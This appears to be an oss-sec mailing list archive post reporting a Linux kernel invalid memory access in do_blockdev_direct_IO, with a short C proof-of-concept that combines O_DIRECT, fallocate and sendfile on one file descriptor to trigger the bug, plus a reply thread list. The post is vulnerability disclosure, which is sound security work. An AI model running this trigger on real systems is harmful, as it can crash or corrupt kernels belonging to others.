oss-sec mailing list archives
linux kernel do_blockdev_direct_IO invalid memory access
From: Marco Grassi <marco.gra () gmail com>
Date: Tue, 11 Oct 2016 22:22:48 +0800
Hello, I posted this to ask for feedback on security at kernel dot org, but I think my mail got bounced back. Not sure if from the mailing list or from some single recipient. Anyway, reposting here: the following program will cause an invalid memory access:

BUG: KASAN: wild-memory-access on address 0005080000000000

See this link for the full sanitizer report, stacktrace and trigger PoC: https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

Tested on current master, with KASAN.

Marco

---

/* Must come before any include so that <fcntl.h> declares fallocate(). */
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/sendfile.h>

int main(void)
{
    int ret = 0;

    /* 0x40 is O_CREAT on x86, so the file is created if missing; a mode
     * argument is required with O_CREAT. */
    int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40, 0644);

    /* Command 4 is F_SETFL; 0x44000 is O_DIRECT|O_NOATIME on x86, so the
     * descriptor is switched to direct I/O after it has been opened. */
    ret = fcntl(fd, 4, 0x44000);

    /* Preallocate 0xafa6 bytes at an unaligned offset (0x21). */
    ret = fallocate(fd, 0, 0x21, 0xafa6);

    /* The same O_DIRECT descriptor is used as both source and destination;
     * this is the call that reaches do_blockdev_direct_IO and trips KASAN. */
    off_t offset = 0;
    ret = sendfile(fd, fd, &offset, 0x800);

    (void)ret;
    return 0;
}
Current thread:
- linux kernel do_blockdev_direct_IO invalid memory access Marco Grassi (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access cve-assign (Oct 11)
- Re: Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)